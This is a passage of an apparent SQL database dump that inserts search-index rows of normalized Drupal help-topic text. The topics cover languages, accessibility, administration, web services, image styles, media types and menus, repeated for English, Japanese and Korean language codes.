(41, 'ko', 'help_search', ' working with languages and translations what text can be translated in your site  there are three types of text that can be translated content blocks content items etc can be written in english or another language and can be translated into additional languages see managing content structure to learn more about content many configuration items also include text that can be translated default configuration provided by your site s software is provided in english you can also download communityprovided translations see managing and deploying configuration to learn more about configuration user interface text that is provided by the core software your install profile themes and modules is provided in english but can be translated into other languages you can also download translations that communitymembers have provided working with languages overview the core language module lets you add new languages to your site provides the language switcher block and provides the ability to configure block visibility by language the block and block visibility settings are only available if you have multiple languages configured the core content translation configuration translation and interface translation modules let you translate content configuration and the builtin user interface respectively the core update manager module manages automatic downloads of communityprovided translations of default configuration and userinterface text see the related topics listed below for specific tasks  ', 1787923659),
(42, 'en', 'help_search', ' accessibility of the administrative interface overview of accessibility the core administrative interface has builtin compliance with many accessibility standards so that most pages are accessible to most users in their default state however certain pages become more accessible to some users through the use of a nondefault or improved interface these interfaces include disabling draganddrop functionality the default draganddrop user interface for ordering tables in the administrative interface presents a challenge for some users including keyboardonly users and users of screen readers and other assistive technology the draganddrop interface can be disabled in a table by clicking a link labeled show row weights above the table the replacement interface allows users to order the table by choosing numerical weights with increasing numbers instead of dragging table rows enabling inline form errors errors that occur when you submit a form such as not filling in a required field are sometimes difficult for users to understand and locate in order to make these errors easier to find the best practice is to put a summary of the errors at the top of the form page to make them easier to understand the best practice is to display error messages with the form fields they are related to both of these practices are implemented by the core inline form errors module  ', 1787923659),
(42, 'ja', 'help_search', ' accessibility of the administrative interface overview of accessibility the core administrative interface has builtin compliance with many accessibility standards so that most pages are accessible to most users in their default state however certain pages become more accessible to some users through the use of a nondefault or improved interface these interfaces include disabling draganddrop functionality the default draganddrop user interface for ordering tables in the administrative interface presents a challenge for some users including keyboardonly users and users of screen readers and other assistive technology the draganddrop interface can be disabled in a table by clicking a link labeled show row weights above the table the replacement interface allows users to order the table by choosing numerical weights with increasing numbers instead of dragging table rows enabling inline form errors errors that occur when you submit a form such as not filling in a required field are sometimes difficult for users to understand and locate in order to make these errors easier to find the best practice is to put a summary of the errors at the top of the form page to make them easier to understand the best practice is to display error messages with the form fields they are related to both of these practices are implemented by the core inline form errors module  ', 1787923659),
(42, 'ko', 'help_search', ' accessibility of the administrative interface overview of accessibility the core administrative interface has builtin compliance with many accessibility standards so that most pages are accessible to most users in their default state however certain pages become more accessible to some users through the use of a nondefault or improved interface these interfaces include disabling draganddrop functionality the default draganddrop user interface for ordering tables in the administrative interface presents a challenge for some users including keyboardonly users and users of screen readers and other assistive technology the draganddrop interface can be disabled in a table by clicking a link labeled show row weights above the table the replacement interface allows users to order the table by choosing numerical weights with increasing numbers instead of dragging table rows enabling inline form errors errors that occur when you submit a form such as not filling in a required field are sometimes difficult for users to understand and locate in order to make these errors easier to find the best practice is to put a summary of the errors at the top of the form page to make them easier to understand the best practice is to display error messages with the form fields they are related to both of these practices are implemented by the core inline form errors module  ', 1787923659),
(43, 'en', 'help_search', ' using the administrative interface what administrative interface components are available  the following administrative interface components are provided by the core software and its modules some contributed modules offer additional functionality accessibility features to enable all users to perform administrative tasks see accessibility of the administrative interface for more information a menu system which you can navigate to find pages for administrative tasks the core toolbar module displays this menu on the top or left side of the page right side in righttoleft languages there are also contributed module replacements for the core toolbar module with additional features such as the admin toolbar module  the core shortcuts module enhances the toolbar with a configurable list of links to commonlyused tasks if you install the core contextual links module nonadministrative pages will contain links leading to related administrative tasks inplace or quick editing inplace editing of configuration is provided by the core settings tray module see using inline quick settings editing for more information the core help module displays help topics and provides a help block that can be placed on administrative pages to provide an overview of their functionality what are the sections of the administrative menu  the administrative menu which you can navigate by visiting  admin on your site or by using an administrative toolbar has the following sections some may not be available depending on which modules are currently installed on your site and your permissions  content  find manage and create new pages manage comments and files structure  place and edit blocks set up content types and fields configure menus administer taxonomy and configure some contributed modules appearance  switch between themes install themes and update existing themes extend  update install and uninstall modules configuration  configure the settings for various site functionality including some contributed modules people  manage user accounts and permissions reports  display information about site security necessary updates and site activity help  get help on using the administrative interface administrative interface overview install the core modules mentioned above to use the corresponding aspect of the administrative interface see the related topics listed below for more details on some aspects of the administrative interface  ', 1787923659),
(43, 'ja', 'help_search', ' using the administrative interface what administrative interface components are available  the following administrative interface components are provided by the core software and its modules some contributed modules offer additional functionality accessibility features to enable all users to perform administrative tasks see accessibility of the administrative interface for more information a menu system which you can navigate to find pages for administrative tasks the core toolbar module displays this menu on the top or left side of the page right side in righttoleft languages there are also contributed module replacements for the core toolbar module with additional features such as the admin toolbar module  the core shortcuts module enhances the toolbar with a configurable list of links to commonlyused tasks if you install the core contextual links module nonadministrative pages will contain links leading to related administrative tasks inplace or quick editing inplace editing of configuration is provided by the core settings tray module see using inline quick settings editing for more information the core help module displays help topics and provides a help block that can be placed on administrative pages to provide an overview of their functionality what are the sections of the administrative menu  the administrative menu which you can navigate by visiting  admin on your site or by using an administrative toolbar has the following sections some may not be available depending on which modules are currently installed on your site and your permissions  content  find manage and create new pages manage comments and files structure  place and edit blocks set up content types and fields configure menus administer taxonomy and configure some contributed modules appearance  switch between themes install themes and update existing themes extend  update install and uninstall modules configuration  configure the settings for various site functionality including some contributed modules people  manage user accounts and permissions reports  display information about site security necessary updates and site activity help  get help on using the administrative interface administrative interface overview install the core modules mentioned above to use the corresponding aspect of the administrative interface see the related topics listed below for more details on some aspects of the administrative interface  ', 1787923659);
INSERT INTO `search_dataset` (`sid`, `langcode`, `type`, `data`, `reindex`) VALUES
(43, 'ko', 'help_search', ' using the administrative interface what administrative interface components are available  the following administrative interface components are provided by the core software and its modules some contributed modules offer additional functionality accessibility features to enable all users to perform administrative tasks see accessibility of the administrative interface for more information a menu system which you can navigate to find pages for administrative tasks the core toolbar module displays this menu on the top or left side of the page right side in righttoleft languages there are also contributed module replacements for the core toolbar module with additional features such as the admin toolbar module  the core shortcuts module enhances the toolbar with a configurable list of links to commonlyused tasks if you install the core contextual links module nonadministrative pages will contain links leading to related administrative tasks inplace or quick editing inplace editing of configuration is provided by the core settings tray module see using inline quick settings editing for more information the core help module displays help topics and provides a help block that can be placed on administrative pages to provide an overview of their functionality what are the sections of the administrative menu  the administrative menu which you can navigate by visiting  admin on your site or by using an administrative toolbar has the following sections some may not be available depending on which modules are currently installed on your site and your permissions  content  find manage and create new pages manage comments and files structure  place and edit blocks set up content types and fields configure menus administer taxonomy and configure some contributed modules appearance  switch between themes install themes and update existing themes extend  update install and uninstall modules configuration  configure the settings for various site functionality including some contributed modules people  manage user accounts and permissions reports  display information about site security necessary updates and site activity help  get help on using the administrative interface administrative interface overview install the core modules mentioned above to use the corresponding aspect of the administrative interface see the related topics listed below for more details on some aspects of the administrative interface  ', 1787923659),
(44, 'en', 'help_search', ' enabling web services what is a web service  a web service allows your site to provide its content and data to other web sites and applications typically the data is transported via http in a serialized machinereadable format what is serialization  serialization is the process of converting complex data structures into text strings so that they can be exchanged and stored the reverse process is called deserialization  json and xml are the two mostcommonlyused data serialization formats for web services what is http basic authentication  http basic authentication is a method for authenticating requests by sending a user name and password along with the request what modules provide web services  the following core software modules provide web services json api module exposes entities to other applications using a fully compliant implementation of the json api specification  see managing content structure for more information on content entities and fields restful web services module exposes entities and other resources to other applications using a rest implementation data is exchanged using a serialization format such as json and transferred using an authentication method such as http basic authentication serialization module provides a framework for adding specific serialization formats for other modules to use http basic authentication module provides a way for web services to be authenticated using http basic authentication against site user accounts there are also contributed modules that provide web services additional resources online documentation for the restful web services module online documentation for the json api module comparison of the restful web services and json api modules ', 1787923659),
(44, 'ja', 'help_search', ' enabling web services what is a web service  a web service allows your site to provide its content and data to other web sites and applications typically the data is transported via http in a serialized machinereadable format what is serialization  serialization is the process of converting complex data structures into text strings so that they can be exchanged and stored the reverse process is called deserialization  json and xml are the two mostcommonlyused data serialization formats for web services what is http basic authentication  http basic authentication is a method for authenticating requests by sending a user name and password along with the request what modules provide web services  the following core software modules provide web services json api module exposes entities to other applications using a fully compliant implementation of the json api specification  see managing content structure for more information on content entities and fields restful web services module exposes entities and other resources to other applications using a rest implementation data is exchanged using a serialization format such as json and transferred using an authentication method such as http basic authentication serialization module provides a framework for adding specific serialization formats for other modules to use http basic authentication module provides a way for web services to be authenticated using http basic authentication against site user accounts there are also contributed modules that provide web services additional resources online documentation for the restful web services module online documentation for the json api module comparison of the restful web services and json api modules ', 1787923659),
(44, 'ko', 'help_search', ' enabling web services what is a web service  a web service allows your site to provide its content and data to other web sites and applications typically the data is transported via http in a serialized machinereadable format what is serialization  serialization is the process of converting complex data structures into text strings so that they can be exchanged and stored the reverse process is called deserialization  json and xml are the two mostcommonlyused data serialization formats for web services what is http basic authentication  http basic authentication is a method for authenticating requests by sending a user name and password along with the request what modules provide web services  the following core software modules provide web services json api module exposes entities to other applications using a fully compliant implementation of the json api specification  see managing content structure for more information on content entities and fields restful web services module exposes entities and other resources to other applications using a rest implementation data is exchanged using a serialization format such as json and transferred using an authentication method such as http basic authentication serialization module provides a framework for adding specific serialization formats for other modules to use http basic authentication module provides a way for web services to be authenticated using http basic authentication against site user accounts there are also contributed modules that provide web services additional resources online documentation for the restful web services module online documentation for the json api module comparison of the restful web services and json api modules ', 1787923659),
(45, 'en', 'help_search', ' configuring help search goal set up your site so that users can search for help steps in the manage administrative menu navigate to extend  verify that the search help and block modules are installed or install them if they are not already installed in the manage administrative menu navigate to configuration   search and metadata   search pages  verify that a help search page is listed in the search pages section if not add a new page of type help  check the indexing status of the help search page if it is not fully indexed see running and configuring cron about how to run cron until indexing is complete in the future you can click rebuild search index on this page or clearing the site cache in order to force help topic text to be reindexed for searching this should be done whenever a module theme language or string translation is updated in the manage administrative menu navigate to structure   block layout  click the link for your administrative theme such as the core claro theme near the top of the page and verify that there is already a search block for help located in the help region if not follow the steps in the related topic to place the search form block in the help region when configuring the block choose help as the search page and in the pages tab under visibility  enter  admin help to make the search form only visible on the main help page in the manage administrative menu navigate to help  verify that the search block is visible and try a search  ', 1787923659),
(45, 'ja', 'help_search', ' configuring help search goal set up your site so that users can search for help steps in the manage administrative menu navigate to extend  verify that the search help and block modules are installed or install them if they are not already installed in the manage administrative menu navigate to configuration   search and metadata   search pages  verify that a help search page is listed in the search pages section if not add a new page of type help  check the indexing status of the help search page if it is not fully indexed see running and configuring cron about how to run cron until indexing is complete in the future you can click rebuild search index on this page or clearing the site cache in order to force help topic text to be reindexed for searching this should be done whenever a module theme language or string translation is updated in the manage administrative menu navigate to structure   block layout  click the link for your administrative theme such as the core claro theme near the top of the page and verify that there is already a search block for help located in the help region if not follow the steps in the related topic to place the search form block in the help region when configuring the block choose help as the search page and in the pages tab under visibility  enter  admin help to make the search form only visible on the main help page in the manage administrative menu navigate to help  verify that the search block is visible and try a search  ', 1787923659),
(45, 'ko', 'help_search', ' configuring help search goal set up your site so that users can search for help steps in the manage administrative menu navigate to extend  verify that the search help and block modules are installed or install them if they are not already installed in the manage administrative menu navigate to configuration   search and metadata   search pages  verify that a help search page is listed in the search pages section if not add a new page of type help  check the indexing status of the help search page if it is not fully indexed see running and configuring cron about how to run cron until indexing is complete in the future you can click rebuild search index on this page or clearing the site cache in order to force help topic text to be reindexed for searching this should be done whenever a module theme language or string translation is updated in the manage administrative menu navigate to structure   block layout  click the link for your administrative theme such as the core claro theme near the top of the page and verify that there is already a search block for help located in the help region if not follow the steps in the related topic to place the search form block in the help region when configuring the block choose help as the search page and in the pages tab under visibility  enter  admin help to make the search form only visible on the main help page in the manage administrative menu navigate to help  verify that the search block is visible and try a search  ', 1787923659),
(46, 'en', 'help_search', ' working with help topics what is a help topic  a help topic describes a concept or steps to accomplish a task related to a feature provided by one or more modules or themes if the core search module is enabled these topics are also searchable where are help topics listed  the toplevel help topics are listed at help links to other topics including nontoplevel help topics can be found under the related heading when viewing a topic page how are help topics provided  modules and themes can provide help topics as twigfilebased plugins in a project subdirectory called helptopics  plugin metadata is provided in yaml front matter within each twig file pluginbased help topics provided by modules and themes will automatically be updated when a module or theme is updated use the plugins in core modules help helptopics as a guide when writing and formatting a help topic plugin for your theme or module how are help topics translated  the title and body text of help topics provided by contributed modules and themes are translatable using user interface translation provided by interface translation module topics provided by custom modules and themes are also translatable if they have been viewed at least once in a nonenglish language which triggers putting their translatable text into the translation database how can users search for help topics  to enable users to search help including help topics you will need to install the core search module configure a search page and add a search block to the help page or another administrative page a search page is provided automatically and if you use the core claro administrative theme a help search block is shown on the main help page then users with search permissions and permission to view help will be able to search help see the related topic configuring help search for stepbystep instructions additional resources help topics standards ', 1787923659),
(46, 'ja', 'help_search', ' working with help topics what is a help topic  a help topic describes a concept or steps to accomplish a task related to a feature provided by one or more modules or themes if the core search module is enabled these topics are also searchable where are help topics listed  the toplevel help topics are listed at help links to other topics including nontoplevel help topics can be found under the related heading when viewing a topic page how are help topics provided  modules and themes can provide help topics as twigfilebased plugins in a project subdirectory called helptopics  plugin metadata is provided in yaml front matter within each twig file pluginbased help topics provided by modules and themes will automatically be updated when a module or theme is updated use the plugins in core modules help helptopics as a guide when writing and formatting a help topic plugin for your theme or module how are help topics translated  the title and body text of help topics provided by contributed modules and themes are translatable using user interface translation provided by interface translation module topics provided by custom modules and themes are also translatable if they have been viewed at least once in a nonenglish language which triggers putting their translatable text into the translation database how can users search for help topics  to enable users to search help including help topics you will need to install the core search module configure a search page and add a search block to the help page or another administrative page a search page is provided automatically and if you use the core claro administrative theme a help search block is shown on the main help page then users with search permissions and permission to view help will be able to search help see the related topic configuring help search for stepbystep instructions additional resources help topics standards ', 1787923659),
(46, 'ko', 'help_search', ' working with help topics what is a help topic  a help topic describes a concept or steps to accomplish a task related to a feature provided by one or more modules or themes if the core search module is enabled these topics are also searchable where are help topics listed  the toplevel help topics are listed at help links to other topics including nontoplevel help topics can be found under the related heading when viewing a topic page how are help topics provided  modules and themes can provide help topics as twigfilebased plugins in a project subdirectory called helptopics  plugin metadata is provided in yaml front matter within each twig file pluginbased help topics provided by modules and themes will automatically be updated when a module or theme is updated use the plugins in core modules help helptopics as a guide when writing and formatting a help topic plugin for your theme or module how are help topics translated  the title and body text of help topics provided by contributed modules and themes are translatable using user interface translation provided by interface translation module topics provided by custom modules and themes are also translatable if they have been viewed at least once in a nonenglish language which triggers putting their translatable text into the translation database how can users search for help topics  to enable users to search help including help topics you will need to install the core search module configure a search page and add a search block to the help page or another administrative page a search page is provided automatically and if you use the core claro administrative theme a help search block is shown on the main help page then users with search permissions and permission to view help will be able to search help see the related topic configuring help search for stepbystep instructions additional resources help topics standards ', 1787923659),
(47, 'en', 'help_search', ' tracking which content a user has visited what content visits are tracked  the core history module tracks when each loggedin user has most recently visited each content item page on the site this allows content to be marked as new or updated for each user meaning that it was newly created or has been updated since the last time they visited its page these records are kept for one month meaning that content older than one month is never marked as new or updated what options are available for using this tracking information  you can display the new updated status of content by creating or editing a view there is a has new content field for content views which displays the new updated marker there is also a has new content filter which limits the view to new and updated content  ', 1787923659),
(47, 'ja', 'help_search', ' tracking which content a user has visited what content visits are tracked  the core history module tracks when each loggedin user has most recently visited each content item page on the site this allows content to be marked as new or updated for each user meaning that it was newly created or has been updated since the last time they visited its page these records are kept for one month meaning that content older than one month is never marked as new or updated what options are available for using this tracking information  you can display the new updated status of content by creating or editing a view there is a has new content field for content views which displays the new updated marker there is also a has new content filter which limits the view to new and updated content  ', 1787923659),
(47, 'ko', 'help_search', ' tracking which content a user has visited what content visits are tracked  the core history module tracks when each loggedin user has most recently visited each content item page on the site this allows content to be marked as new or updated for each user meaning that it was newly created or has been updated since the last time they visited its page these records are kept for one month meaning that content older than one month is never marked as new or updated what options are available for using this tracking information  you can display the new updated status of content by creating or editing a view there is a has new content field for content views which displays the new updated marker there is also a has new content filter which limits the view to new and updated content  ', 1787923659),
(48, 'en', 'help_search', ' adding an image style goal add a new image style which can be used to process and display images see managing media for an overview of image styles steps in the manage administrative menu navigate to configuration   media  image styles click add image style  enter a descriptive image style name  and click create new style  under effect  choose an effect to apply and click add  configure the effect on the next page most effects require some additional configuration after they are added for example for the crop effect enter the width and height to crop the image to and choose the anchor point click add effect  repeat the previous two steps until all of the effects have been added drag to change the order of the effects then click save to save the new order the image style can now be used to format a field containing an image in your layouts or traditional field displays it can also be used as part of a responsive image style see related topics below for more information  ', 1787923659),
(48, 'ja', 'help_search', ' adding an image style goal add a new image style which can be used to process and display images see managing media for an overview of image styles steps in the manage administrative menu navigate to configuration   media  image styles click add image style  enter a descriptive image style name  and click create new style  under effect  choose an effect to apply and click add  configure the effect on the next page most effects require some additional configuration after they are added for example for the crop effect enter the width and height to crop the image to and choose the anchor point click add effect  repeat the previous two steps until all of the effects have been added drag to change the order of the effects then click save to save the new order the image style can now be used to format a field containing an image in your layouts or traditional field displays it can also be used as part of a responsive image style see related topics below for more information  ', 1787923659),
(48, 'ko', 'help_search', ' adding an image style goal add a new image style which can be used to process and display images see managing media for an overview of image styles steps in the manage administrative menu navigate to configuration   media  image styles click add image style  enter a descriptive image style name  and click create new style  under effect  choose an effect to apply and click add  configure the effect on the next page most effects require some additional configuration after they are added for example for the crop effect enter the width and height to crop the image to and choose the anchor point click add effect  repeat the previous two steps until all of the effects have been added drag to change the order of the effects then click save to save the new order the image style can now be used to format a field containing an image in your layouts or traditional field displays it can also be used as part of a responsive image style see related topics below for more information  ', 1787923659),
(49, 'en', 'help_search', ' adding a language goal add a language to your site steps in the manage administrative menu navigate to configuration   region and language  languages click add language  if your language is in the language name list select it and click add language  if your language is not in the list select custom language  and enter the language code   language name  and direction for the language click add custom language  wait for the translation system to be updated also if you have the core update manager module installed and translations are available for your language wait for translations to be downloaded you should be returned to the languages page when this completes  ', 1787923659),
(49, 'ja', 'help_search', ' adding a language goal add a language to your site steps in the manage administrative menu navigate to configuration   region and language  languages click add language  if your language is in the language name list select it and click add language  if your language is not in the list select custom language  and enter the language code   language name  and direction for the language click add custom language  wait for the translation system to be updated also if you have the core update manager module installed and translations are available for your language wait for translations to be downloaded you should be returned to the languages page when this completes  ', 1787923659),
(49, 'ko', 'help_search', ' adding a language goal add a language to your site steps in the manage administrative menu navigate to configuration   region and language  languages click add language  if your language is in the language name list select it and click add language  if your language is not in the list select custom language  and enter the language code   language name  and direction for the language click add custom language  wait for the translation system to be updated also if you have the core update manager module installed and translations are available for your language wait for translations to be downloaded you should be returned to the languages page when this completes  ', 1787923659),
(50, 'en', 'help_search', ' configuring language detection and selection goal configure the methods used to decide which language will be used to display text on your site what is a language detection method  a language detection method is a way for your site to decide what language should be used to display text this decision is made by evaluating a series of detection methods for languages the first detection method that gets a result will determine which language is used if you have more than one language on your site you can configure the detection methods that are used and the order they are evaluated for both user interface text and content text configuration text always uses the interface text method and most sites use the same detection methods for all types of text what language detection methods are available  the available detection methods depend on what modules you have installed some of the most commonlyused language detection methods are url use the language from the url which can either be in a path prefix like examplecom fr pagepath for french fr language or in a domain like frexamplecom pagepath  user for logged in users use the language they have set in their profiles browser use the language preferences from the user s browser selected language use the language most recently selected from a language switcher block session use the language from a session parameter or a request parameter for example adding  language fr to the end of the url steps in the manage administrative menu navigate to configuration   region and language   languages  detection and selection check the boxes to enable the desired language detection methods and uncheck boxes for the methods you do not want to use drag the methods to change their order if desired click save settings  click configure on each enabled detection method and verify that its configuration is correct or update the configuration if not  ', 1787923659),
(50, 'ja', 'help_search', ' configuring language detection and selection goal configure the methods used to decide which language will be used to display text on your site what is a language detection method  a language detection method is a way for your site to decide what language should be used to display text this decision is made by evaluating a series of detection methods for languages the first detection method that gets a result will determine which language is used if you have more than one language on your site you can configure the detection methods that are used and the order they are evaluated for both user interface text and content text configuration text always uses the interface text method and most sites use the same detection methods for all types of text what language detection methods are available  the available detection methods depend on what modules you have installed some of the most commonlyused language detection methods are url use the language from the url which can either be in a path prefix like examplecom fr pagepath for french fr language or in a domain like frexamplecom pagepath  user for logged in users use the language they have set in their profiles browser use the language preferences from the user s browser selected language use the language most recently selected from a language switcher block session use the language from a session parameter or a request parameter for example adding  language fr to the end of the url steps in the manage administrative menu navigate to configuration   region and language   languages  detection and selection check the boxes to enable the desired language detection methods and uncheck boxes for the methods you do not want to use drag the methods to change their order if desired click save settings  click configure on each enabled detection method and verify that its configuration is correct or update the configuration if not  ', 1787923659),
(50, 'ko', 'help_search', ' configuring language detection and selection goal configure the methods used to decide which language will be used to display text on your site what is a language detection method  a language detection method is a way for your site to decide what language should be used to display text this decision is made by evaluating a series of detection methods for languages the first detection method that gets a result will determine which language is used if you have more than one language on your site you can configure the detection methods that are used and the order they are evaluated for both user interface text and content text configuration text always uses the interface text method and most sites use the same detection methods for all types of text what language detection methods are available  the available detection methods depend on what modules you have installed some of the most commonlyused language detection methods are url use the language from the url which can either be in a path prefix like examplecom fr pagepath for french fr language or in a domain like frexamplecom pagepath  user for logged in users use the language they have set in their profiles browser use the language preferences from the user s browser selected language use the language most recently selected from a language switcher block session use the language from a session parameter or a request parameter for example adding  language fr to the end of the url steps in the manage administrative menu navigate to configuration   region and language   languages  detection and selection check the boxes to enable the desired language detection methods and uncheck boxes for the methods you do not want to use drag the methods to change their order if desired click save settings  click configure on each enabled detection method and verify that its configuration is correct or update the configuration if not  ', 1787923659),
(51, 'en', 'help_search', ' importing a translation file goal import a file po extension containing translations for user interface text steps in the manage administrative menu navigate to configuration   region and language   user interface translation  import browse to find the translation file you want to import select the language and check the desired import options click import and wait for your file to be imported  ', 1787923659),
(51, 'ja', 'help_search', ' importing a translation file goal import a file po extension containing translations for user interface text steps in the manage administrative menu navigate to configuration   region and language   user interface translation  import browse to find the translation file you want to import select the language and check the desired import options click import and wait for your file to be imported  ', 1787923659),
(51, 'ko', 'help_search', ' importing a translation file goal import a file po extension containing translations for user interface text steps in the manage administrative menu navigate to configuration   region and language   user interface translation  import browse to find the translation file you want to import select the language and check the desired import options click import and wait for your file to be imported  ', 1787923659),
(52, 'en', 'help_search', ' translating user interface text goal translate user interface text strings from english into a nonenglish language that is configured on your site steps in the manage administrative menu navigate to configuration   region and language  user interface translation using the filters search for a string or set of strings that you want to translate make sure to select the correct translation language if you have more than one nonenglish language on your site enter new translations and click save translations  repeat these steps until all of the desired user interface text is translated for all languages on your site  ', 1787923659),
(52, 'ja', 'help_search', ' translating user interface text goal translate user interface text strings from english into a nonenglish language that is configured on your site steps in the manage administrative menu navigate to configuration   region and language  user interface translation using the filters search for a string or set of strings that you want to translate make sure to select the correct translation language if you have more than one nonenglish language on your site enter new translations and click save translations  repeat these steps until all of the desired user interface text is translated for all languages on your site  ', 1787923659),
(52, 'ko', 'help_search', ' translating user interface text goal translate user interface text strings from english into a nonenglish language that is configured on your site steps in the manage administrative menu navigate to configuration   region and language  user interface translation using the filters search for a string or set of strings that you want to translate make sure to select the correct translation language if you have more than one nonenglish language on your site enter new translations and click save translations  repeat these steps until all of the desired user interface text is translated for all languages on your site  ', 1787923659),
(53, 'en', 'help_search', ' checking interface translation status goal check the current status of interface translations and see if there are any updates available steps in the manage administrative menu navigate to configuration   region and language  languages look at the interface translation column in the language table to find the percentage of user interface text that has been translated for each language in the manage administrative menu navigate to reports   available translation updates  this report is only available if the core update status module is installed optionally click check manually to update the report view the report to find out if any languages have translation updates that you can download  ', 1787923659),
(53, 'ja', 'help_search', ' checking interface translation status goal check the current status of interface translations and see if there are any updates available steps in the manage administrative menu navigate to configuration   region and language  languages look at the interface translation column in the language table to find the percentage of user interface text that has been translated for each language in the manage administrative menu navigate to reports   available translation updates  this report is only available if the core update status module is installed optionally click check manually to update the report view the report to find out if any languages have translation updates that you can download  ', 1787923659),
(53, 'ko', 'help_search', ' checking interface translation status goal check the current status of interface translations and see if there are any updates available steps in the manage administrative menu navigate to configuration   region and language  languages look at the interface translation column in the language table to find the percentage of user interface text that has been translated for each language in the manage administrative menu navigate to reports   available translation updates  this report is only available if the core update status module is installed optionally click check manually to update the report view the report to find out if any languages have translation updates that you can download  ', 1787923659),
(54, 'en', 'help_search', ' adding a new media type goal add a new media type that can be referenced in media reference fields media types are a content entity type see managing media for an overview of media items and media types and managing content structure for more information on content entities and fields steps in the manage administrative menu navigate to structure  media types if there is not already a media type for the type of media you want to use on your site click add media type  enter a name and description for your media type and select the media source  for most media sources there is additional information that will need to be stored with your media item in a field on your media type under media source configuration  select an existing field to reuse to store this information or select  create  to create a new field note the types of metadata in the field mapping section that can be mapped to fields on your media type click save  optionally add additional fields for the metadata noted above or for other information that you want to store to your media type by clicking on manage fields  see related topic below if you have added metadata fields click edit  under field mapping  select the fields you added for each piece of metadata information click save  you can now use this media type by adding a media reference field to any content entity subtype see related topic below  ', 1787923659),
(54, 'ja', 'help_search', ' adding a new media type goal add a new media type that can be referenced in media reference fields media types are a content entity type see managing media for an overview of media items and media types and managing content structure for more information on content entities and fields steps in the manage administrative menu navigate to structure  media types if there is not already a media type for the type of media you want to use on your site click add media type  enter a name and description for your media type and select the media source  for most media sources there is additional information that will need to be stored with your media item in a field on your media type under media source configuration  select an existing field to reuse to store this information or select  create  to create a new field note the types of metadata in the field mapping section that can be mapped to fields on your media type click save  optionally add additional fields for the metadata noted above or for other information that you want to store to your media type by clicking on manage fields  see related topic below if you have added metadata fields click edit  under field mapping  select the fields you added for each piece of metadata information click save  you can now use this media type by adding a media reference field to any content entity subtype see related topic below  ', 1787923659),
(54, 'ko', 'help_search', ' adding a new media type goal add a new media type that can be referenced in media reference fields media types are a content entity type see managing media for an overview of media items and media types and managing content structure for more information on content entities and fields steps in the manage administrative menu navigate to structure  media types if there is not already a media type for the type of media you want to use on your site click add media type  enter a name and description for your media type and select the media source  for most media sources there is additional information that will need to be stored with your media item in a field on your media type under media source configuration  select an existing field to reuse to store this information or select  create  to create a new field note the types of metadata in the field mapping section that can be mapped to fields on your media type click save  optionally add additional fields for the metadata noted above or for other information that you want to store to your media type by clicking on manage fields  see related topic below if you have added metadata fields click edit  under field mapping  select the fields you added for each piece of metadata information click save  you can now use this media type by adding a media reference field to any content entity subtype see related topic below  ', 1787923659),
(55, 'en', 'help_search', ' configure menu settings for a content type goal for an existing content type configure the available menus that will be shown as options on content editing screens links to content items of this type can be added to these menus during editing steps in the manage administrative menu navigate to structure  content types locate the content type you want to configure and click edit in the operations list under menu settings  check the menus that you want to be available when editing a content item of this type optionally select the default parent item  to put links to content items under a default location in the menu structure click save   ', 1787923659),
(55, 'ja', 'help_search', ' configure menu settings for a content type goal for an existing content type configure the available menus that will be shown as options on content editing screens links to content items of this type can be added to these menus during editing steps in the manage administrative menu navigate to structure  content types locate the content type you want to configure and click edit in the operations list under menu settings  check the menus that you want to be available when editing a content item of this type optionally select the default parent item  to put links to content items under a default location in the menu structure click save   ', 1787923659),
(55, 'ko', 'help_search', ' configure menu settings for a content type goal for an existing content type configure the available menus that will be shown as options on content editing screens links to content items of this type can be added to these menus during editing steps in the manage administrative menu navigate to structure  content types locate the content type you want to configure and click edit in the operations list under menu settings  check the menus that you want to be available when editing a content item of this type optionally select the default parent item  to put links to content items under a default location in the menu structure click save   ', 1787923659),
(56, 'en', 'help_search', ' adding a link to a menu goal add a link to a menu note that you can also add a link to a menu from the content edit page if menu settings have been configured for the content type steps in the manage administration menu navigate to structure  menus locate the desired menu and click add link in the operations list enter the menu link title to be displayed enter the link  one of the following an internal path such as  node add a full external url start typing the title of a content item and select it when the full title comes up  nolink  to display the menu link title as plain text without a link  front  to link to the front page of your site make sure that enabled is checked if not the menu link will not be displayed optionally enter a description  which will be displayed when a user hovers over the link optionally check show as expanded to automatically show the children of this link if any when this link is shown optionally select the parent link  if this menu link should be a child of another menu link click save  you will be returned to the add link page to add another link in the manage administration menu navigate to structure  menus locate the menu you just added a link to and click edit in the operations list verify that the order of links is correct if it is not drag menu links until the order is correct and click save   ', 1787923659),
(56, 'ja', 'help_search', ' adding a link to a menu goal add a link to a menu note that you can also add a link to a menu from the content edit page if menu settings have been configured for the content type steps in the manage administration menu navigate to structure  menus locate the desired menu and click add link in the operations list enter the menu link title to be displayed enter the link  one of the following an internal path such as  node add a full external url start typing the title of a content item and select it when the full title comes up  nolink  to display the menu link title as plain text without a link  front  to link to the front page of your site make sure that enabled is checked if not the menu link will not be displayed optionally enter a description  which will be displayed when a user hovers over the link optionally check show as expanded to automatically show the children of this link if any when this link is shown optionally select the parent link  if this menu link should be a child of another menu link click save  you will be returned to the add link page to add another link in the manage administration menu navigate to structure  menus locate the menu you just added a link to and click edit in the operations list verify that the order of links is correct if it is not drag menu links until the order is correct and click save   ', 1787923659),
(56, 'ko', 'help_search', ' adding a link to a menu goal add a link to a menu note that you can also add a link to a menu from the content edit page if menu settings have been configured for the content type steps in the manage administration menu navigate to structure  menus locate the desired menu and click add link in the operations list enter the menu link title to be displayed enter the link  one of the following an internal path such as  node add a full external url start typing the title of a content item and select it when the full title comes up  nolink  to display the menu link title as plain text without a link  front  to link to the front page of your site make sure that enabled is checked if not the menu link will not be displayed optionally enter a description  which will be displayed when a user hovers over the link optionally check show as expanded to automatically show the children of this link if any when this link is shown optionally select the parent link  if this menu link should be a child of another menu link click save  you will be returned to the add link page to add another link in the manage administration menu navigate to structure  menus locate the menu you just added a link to and click edit in the operations list verify that the order of links is correct if it is not drag menu links until the order is correct and click save   ', 1787923659),
(57, 'en', 'help_search', ' creating a menu goal create a new menu steps in the manage administration menu navigate structure  menus click add menu  enter the title for the menu which is used as the default block title if the menu is displayed as a block if desired also edit the machine name of the menu which is by default derived from the title enter an administrative summary which is displayed on the menus page if your site has more than one language choose the language for the menu click save  you will be on the menu editing page ready to add links to the menu if the core custom menu links module is installed see related topics for further tasks  ', 1787923659),
